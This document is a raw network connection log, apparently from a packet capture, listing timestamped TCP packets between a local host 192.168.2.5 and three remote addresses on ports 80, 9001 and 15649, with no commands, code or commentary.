Dec 24, 2023 10:44:32.918026924 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.918026924 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.918039083 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.918051004 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.918062925 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.918062925 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.918093920 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.918093920 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.918123960 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.919212103 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.919287920 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.919327021 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.924482107 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.924547911 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.924587965 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.925571918 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.925616026 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.925658941 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.925695896 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.925745010 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.925785065 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.925928116 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.925971031 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.926065922 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.926103115 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.926165104 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.926203012 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.926347017 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.926388979 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.926445007 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.926491976 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.926497936 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.926529884 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.926533937 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.926561117 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.926572084 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.926595926 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.926632881 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.926667929 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.926711082 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.926750898 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.926772118 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.926783085 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.926817894 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.926829100 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.926884890 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.926887989 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.926949978 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.927490950 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.927531958 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.927573919 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.927613974 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.927653074 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.927695036 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.928658009 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.928699970 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.928709030 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.928747892 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.928749084 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.928786039 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.929627895 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.929683924 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.929727077 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.931659937 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.936770916 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.937022924 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.937071085 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.941817999 CET	15649	49723	212.118.39.73	192.168.2.5
Dec 24, 2023 10:44:32.941878080 CET	49723	15649	192.168.2.5	212.118.39.73
Dec 24, 2023 10:44:32.941982985 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.942137957 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.942183018 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.946779966 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.946904898 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.946953058 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.947568893 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.951692104 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.951822996 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.951862097 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.956346035 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.956495047 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.956541061 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.961219072 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.961231947 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.961291075 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.965696096 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.965708017 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.965769053 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.970066071 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.970216990 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.970256090 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.974560976 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.974572897 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.974617004 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.978864908 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.979015112 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.979074955 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.983230114 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.983354092 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.983395100 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.987544060 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.987679958 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.987726927 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.991777897 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.991910934 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.991955996 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.995826960 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.995960951 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.996001005 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.000071049 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.000085115 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.000123024 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.004170895 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.004184961 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.004229069 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.007775068 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.007791996 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.007838964 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.012095928 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.012259960 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.012304068 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.016149998 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.016164064 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.016222000 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.019737959 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.019871950 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.019925117 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.023736954 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.023750067 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.023794889 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.027626038 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.027698994 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.027745962 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.028911114 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.028974056 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.029016018 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.032852888 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.032917976 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.032979965 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.036431074 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.036555052 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.036601067 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.040183067 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.040525913 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.040576935 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.043824911 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.043898106 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.043936968 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.047435999 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.047493935 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.047539949 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.050883055 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.051031113 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.051078081 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.054610014 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.054658890 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.054702044 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.058223963 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.058289051 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.058336020 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.061526060 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.061580896 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.061623096 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.065265894 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.065576077 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.065622091 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.068425894 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.068479061 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.068526030 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.071923018 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.072197914 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.072244883 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.075216055 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.075270891 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.075325966 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.078762054 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.078855991 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.078903913 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.082031965 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.082099915 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.082139015 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.085340023 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.085391998 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.085432053 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.088805914 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.088938951 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.088979006 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.091939926 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.092004061 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.092044115 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.095256090 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.095304966 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.095345974 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.098442078 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.098507881 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.098546982 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.101721048 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.101798058 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.101840019 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.104785919 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.104856014 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.104902029 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.108093977 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.108212948 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.108257055 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.111208916 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.111251116 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.111290932 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.114290953 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.114377022 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.114415884 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.117374897 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.117398024 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.117435932 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.120419979 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.120476007 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.120518923 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.123766899 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.123811960 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.123852968 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.126790047 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.126854897 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.126895905 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.129611969 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.129677057 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.129719019 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.132584095 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.132704020 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.132786036 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.135746956 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.135818958 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.135863066 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.138674974 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.138747931 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.138792038 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.141706944 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.141758919 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.141799927 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.144632101 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.144707918 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.144751072 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.147670984 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.147728920 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.147770882 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.150489092 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.150552034 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.150599003 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.153357983 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.153445959 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.153497934 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.156234980 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.156296968 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.156388998 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.159135103 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.159189939 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.159239054 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.161734104 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:33.161948919 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.162018061 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.162060022 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.164726019 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.164756060 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.164802074 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.167417049 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.167471886 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.167608976 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.170053959 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.170094013 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.170150042 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.172771931 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.172852039 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.172897100 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.174330950 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:33.175504923 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.175584078 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.175633907 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.177752972 CET	15649	49723	212.118.39.73	192.168.2.5
Dec 24, 2023 10:44:33.177815914 CET	49723	15649	192.168.2.5	212.118.39.73
Dec 24, 2023 10:44:33.178047895 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.178097963 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.178153038 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.180859089 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.180910110 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.180953979 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.183372021 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.183429003 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.183474064 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.186113119 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.186188936 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.186232090 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.188889027 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.188957930 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.189018011 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.191309929 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.191385031 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.191427946 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.192473888 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:33.192764997 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:33.193871021 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.193943977 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.193986893 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.196482897 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.196541071 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.196701050 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.198954105 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.199018002 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.199079037 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.201514006 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.201560020 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.201616049 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.204001904 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.204102993 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.204215050 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.206577063 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.206676006 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.206722021 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.209084988 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.209140062 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.209189892 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.211464882 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.211622000 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.211672068 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.213951111 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.214016914 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.214333057 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.216444016 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.216478109 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.216521978 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.218852043 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.218914986 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.218967915 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.221162081 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.221227884 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.221281052 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.223587990 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.223647118 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.223709106 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.225994110 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.226052999 CET	80	49724	5.42.65.125	192.168.2.5
